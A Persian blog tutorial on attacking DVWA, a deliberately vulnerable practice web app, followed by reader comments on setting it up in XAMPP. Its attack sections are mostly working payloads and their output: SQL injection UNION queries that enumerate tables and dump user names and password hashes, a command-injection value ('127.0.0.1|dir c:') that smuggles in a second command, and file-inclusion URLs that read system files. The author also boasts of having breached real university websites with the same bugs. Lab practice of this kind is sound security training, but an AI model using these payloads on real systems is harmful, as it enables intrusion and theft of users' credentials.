تست نفوذ به وب سایت ها - معرفی و استفاده از باگ ها در محیط شبیه سازی شده

سلام خدمت دوستان

در مقاله قبلی در مورد نرم افزار های مورد نیاز و امنیت در نرم افزار های تحت وب و بررسی خطا های Sql injection صحبت کردیم حال به ادامه مبحت معرفی و استفاده از باگ ها در محیط شبیه سازی شده را شروع میکنم

استفاده از باگ ها


حالا به استفاده از باگ های ارائه شده موجود میپردازیم. جهت تمرین از یک وبسایت شبیه سازی شده به نام DVWA استفاده میکنیم که میتوانید از آدرس زیر آخرین ورژن آن را دانلود کنید .

DVWA

البته این برنامه در نسخه های لینوکسی مثل Kali-linux یافت میشود . در ضمن پس از دانلود شما باید با برنامه XAMPP این فایل رو آپ کنید و بعد در مرورگر سیستم خود از آن استفاده کنید یعنی فایل رو پس از دانلود تو مسیر زیر قرار دهید و همچنین اون دسته از دوستان که با این سرویس آشنا نیستن میتونن به لینک های زیر مراجعه نمایند .

WAMP چیست ؟ XAMPP چیست ؟ معرفی دو شبیه ساز هاستینگ در محیط لوکال

آموزش تصویری نصب xampp

c:\xampp\htdocs

تست نفوذ به وب سایت ها - معرفی و استفاده از باگ ها در محیط شبیه سازی شده

صفحه ورود سیستم DVWA

جهت ورود به سیستم میتوانید از نام کاربری و گذرواژه زیر استفاده کنید.

[Username] : admin
[Password] : password

تست نفوذ به وب سایت ها - معرفی و استفاده از باگ ها در محیط شبیه سازی شده

صفحه اصلی سیستم DVWA

از منوی سمت چپ میتوانید باگ مورد نظر خود را انتخاب کرده و شروع به تست کنید. ابتدا روی DVWA Security کلیک کرده و Security Level را روی Low قرار دهید .

SQL Injection


جهت انجام این آزمون روی دکمه مربوطه کلیک نمایید تا صفحه ای مشابه به شکل زیر را ببینید.

تست نفوذ به وب سایت ها - معرفی و استفاده از باگ ها در محیط شبیه سازی شده

بخش SQL Injection سیستم

مراحل کار را به ترتیب انجام دهید و نتیجه را مشاهده کنید.

  1. بخش مربوط به شناسایی باگ
  2.   1
      1’ or 1=1
      1’ or 1=1#
    

بعد از اجرای آخرین دستور به تمام داده های موجود قابل نمایش دست پیدا خواهید کرد.

  1. پیدا کردن تعداد ستونها
  2.   1' order by 10 #
      1' order by 5 #
      1' order by 2 #
      1' order by 3 #
    

همانطور که مشاهده می شود، تعداد ستونها 2 می باشد.

  1. نمایش ستونهای آسیب پذیر
  2.   1' union select 1,2 #
      -1' union select version(),database() #
    

همانطور که مشاهده می شود، هر دو ستون آسیب پذیرند زیرا ورژن و نام دیتابیس مورد استفاده در وبسایت را به ما می دهند. با توجه به شکل زیر اطلاعات سطر اول ورژن دیتابیس (5,5,32) و سطر بعدی نام دیتابیس (dvwa) می باشد.

تست نفوذ به وب سایت ها - معرفی و استفاده از باگ ها در محیط شبیه سازی شده

نمایش ستون های آسیب پذیر در سیستم

  1. به دست آوردن نام جدول

درصورتی که ورژن بدست آمده از مرحله قبل از 5 بیشتر باشد میتوان از information_schema استفاده کرد .

-1' union select group_concat(table_name),2 from information_schema.tables where
table_schema=database() #

تست نفوذ به وب سایت ها - معرفی و استفاده از باگ ها در محیط شبیه سازی شده

بدست آوردن نام تیبل های موجود در دیتابیس سیستم

همانطور که مشاهده می شود، نام جداول guestbook و users می باشد .

  1. به دست آوردن ستونهای یک جدول
  2. -1' union select group_concat(column_name),2 from information_schema.columns where
    table_name='users' #
    

تست نفوذ به وب سایت ها - معرفی و استفاده از باگ ها در محیط شبیه سازی شده

بدست آوردن نام ستون های یک جدول

  1. بیرون کشیدن اطلاعات یک جدول
  2. -1' union select group_concat(user,' : ',password,'<br/>'),' ' from users #
    

تست نفوذ به وب سایت ها - معرفی و استفاده از باگ ها در محیط شبیه سازی شده

دریافت اطلاعات نام کاربری و گذرواژه سیستم

همانطور که مشاهد می شود، به راحتی اطلاعات نام کاربری و گذرواژه تمام افراد بدست آمد.

admin : 5f4dcc3b5aa765d61d8327deb882cf99
gordonb : e99a18c428cb38d5f260853678922e03
1337 : 8d3533d75ae2c3966d7e0d4fcc69216b
pablo : 0d107d09f5bbe40cade3de5c71e9e9b7
smithy : 5f4dcc3b5aa765d61d8327deb882cf99

توجه شود که گذرواژه ها بصورت MD5 HASH شده می باشند. برای کرک کردن میتوان از وبسایت های زیر استفاده نمود .

www.md5.net

www.md5cracker.org

نتیجه بدست آمده بصورت زیر می باشد.

5f4dcc3b5aa765d61d8327deb882cf99 MD5 : password
e99a18c428cb38d5f260853678922e03 MD5 : abc123
8d3533d75ae2c3966d7e0d4fcc69216b MD5 : charley
0d107d09f5bbe40cade3de5c71e9e9b7 MD5 : letmein
5f4dcc3b5aa765d61d8327deb882cf99 MD5 : password

در نهایت به این اطلاعات دست پیدا کرده اید.

admin : password
gordonb :abc123
1337 : charley
pablo : letmein
smithy : password

وبسایت های داخلی که به شخصه در گذشته به وسیله همین باگ ها مورد نفوذ قرار گرفتن وبسایت هایی مانند دانشگاه های علوم تحقیقات، تهران مرکز، آزاد خمین و ... میباشد.

تست نفوذ به وب سایت ها - معرفی و استفاده از باگ ها در محیط شبیه سازی شده

وبسایت دانشگاه تهران مرکز

(Command Injection (rce


برای آزمون این باگ وارد بخش مربوطه شوید. حالا بطور مثال IP خودتان را وارد کنید (127.0.0.1)

تست نفوذ به وب سایت ها - معرفی و استفاده از باگ ها در محیط شبیه سازی شده

اطلاعات مربوط به Ping 127.0.0.1

حال به کد دقت کنید

<?php
$target = $_REQUEST[ 'ip' ];
$cmd = shell_exec( 'ping ' . $target );
echo "<pre>{$cmd}</pre>";
?>

حال به جای وارد کردن IP خالی دستور زیر را وارد میکنیم.

127.0.0.1|dir
127.0.0.1|dir e:
127.0.0.1|dir c:
127.0.0.1|dir d:

به این ترتیب میتوان به فایلهای مختلف دست پیدا کرد .

( File Inclusion ( lfi \ rfi


ابتدا وارد قسمت مربوطه شوید.

http://localhost:port/DVWA/vulnerabilities/fi/?page=file1.php

همانطور که مشاهده میشود، در انتهای آدرس فایل یک ، php درحال خواندن و نمایش میباشد.

تست LFI

http://localhost:port/DVWA/vulnerabilities/fi/?page=C:\Windows\System32\dri
vers\etc\hosts

تست نفوذ به وب سایت ها - معرفی و استفاده از باگ ها در محیط شبیه سازی شده

آسیب پذیر بودن سیستم نسبت به باگ LFI

همانطور که مشاهده میشود اطلاعات موردنظر قابل مشاهد می باشد.

تست RFI

http://localhost:port/DVWA/vulnerabilities/fi/?page=http://google.com

تست نفوذ به وب سایت ها - معرفی و استفاده از باگ ها در محیط شبیه سازی شده

عدم آسیب پذیری RFI

طبق نتایج میتوان فهمید که این آسیب پذیری وجود ندارد، علت هم قابل مشاهده می باشد

https:// wrapper is disabled in the server configuration by allow_url_include=0

اجازه دسترسی به //: https بسته شده است.

به نظرم تا به این جا کافیست در ادامه تبدیل LFI به XSS رو توضیح خواهم داد دوستان بازم تاکید میکنم که مطالب جنبه آموزشی دارد تا اون دسته از دوست دارن این عرصه بتونن با این جور متد ها آشنایی کامل پیدا کنن

موفق و پیروز

نویسنده : FSBYANGE

منبع : جزیره امنیت اطلاعات و ارتباطات وب سایت توسینسو

هرگونه نشر و کپی برداری بدون ذکر منبع و نام نویسنده دارای اشکال اخلاقی می باشد

#تست_امنیت_و_نفوذ_پذیری #مراحل_انجام_یک_حمله_هکری #تست_آسیب_پذیری #حمله_لایه #حمله_ddos_چیست #آموزش_تست_نفوذ_با_کالی #تست_امنیت_وب_سایت
4 نظر
محمد نصیری

عالی بود مهندس ، دوستان میدونن من تا از یک مطلبی واقعا لذت نبرم Comment نمیزارم ، این مطلب و به ویژه DVWA خیلی می تونه تو حوزه آموزشی کمک کنه ، من Damn Vulnerable Linux و Damn Small Linux و OWASP Broken Web Applications Project استفاده می کردم و این یکی رو هنوز تست نکرده بودم و برام جالب بود ، آموزش ITPRO یی بود واقعا ..

fsbyange

خواهش میکنم محمد جان

امیدوارم مطالب پرفکت تری در اختیار شما دوستان قرار دهم مثل آموزش نوشتن Exploit و....

Omid Sarab

واقعا عالی بود مهندس ، چون از آنجا که به راحتی نمی توان سایت های آسیب پذیر را پیدا کرد همیشه دغدغه تست و یادگیری را داشتم ، اما ظاهرا با DVWA به راحتی می توان تست نفوذ پذیری و پیدا کردن حفره های امنیتی را یاد گرفت.

بعد از اینکه این شبیه ساز رو معرفی کردین ، سریع اقدام کردم واسه نصبش ولی هنگام نصب با دو مشکل مواجه شدم و بابتشون راه حلی پیداکردم برای همین لازم دونستم برای ITpro هایی که میان این مقاله را می خونن به اشتراک بزارم.

اونم اینکه بعده نصب XAMPP آپاچی اجرا نمی شد اونم بخاطر اینکه دو پورت 80 و 443 توسط یه نرم افزاری رو سیستمم مشغول بود که باید این دو پورت را در XAMPP تغییر بدین.

XAMPP

طبق تصویر بالا باید 2 فایل موجود در دایرکتوری XAMPP را تغییر بدین، یعنی بعده باز کردن از طریق notepad هرجا عدد 80 و 443 دیدین باید به یک عدد دیگر تغییر پورت داده شود( می تونید از Replace نوت پد استفاده کنین)

مشکل دوم هم بعد از قرار دادن فایل dvwa در مسیر c:\xampp\htdocs و رفتن به مسیر زیر صفحه لاگین برایم نمایش داده نمی شد

http://localhost:90/DVWA/

که باید به این مسیر رفته

http://localhost:90/phpmyadmin

و یک دیتابیس مطابق تصوی زیر بسازید

Xampp

و در آخر بارفتن به این مسیر

C:\xampp\htdocs\DVWA\config

فایل config.inc را مطابق تصویر ویرایش میکنیم

dvwa1

امیدوارم برای تمام ITPRO ها مفید باشه

محمد نصیری

ممنونم از به اشتراک گذاری دانشتون ، حتما مفید هست

نظر شما
برای ارسال نظر باید وارد شوید.
از سرتاسر توسینسو
تنظیمات حریم خصوصی
تائید صرفنظر
×

تو می تونی بهترین نتیجه رو تضمینی با بهترین های ایران بدست بیاری ، پس مقایسه کن و بعد خرید کن : فقط توی جشنواره تابستانه می تونی امروز ارزونتر از فردا خرید کنی ....